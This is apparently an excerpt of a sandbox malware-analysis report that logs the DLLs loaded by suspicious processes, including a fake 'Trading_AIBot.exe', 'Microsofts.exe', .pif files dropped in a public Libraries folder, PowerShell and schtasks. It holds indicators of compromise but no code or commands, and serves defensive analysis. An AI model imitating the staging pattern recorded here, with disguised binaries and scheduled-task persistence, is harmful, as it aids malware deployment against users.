                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: slc.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: apphelp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: version.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: uxtheme.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: url.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieframe.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iertutil.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netapi32.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: userenv.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winhttp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wkscli.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netutils.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: amsi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: smartscreenps.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: kernel.appcore.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winmm.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wininet.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sspicli.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: windows.storage.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wldp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: profapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mswsock.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iphlpapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winnsi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??????????.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ????.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: tquery.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptdll.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
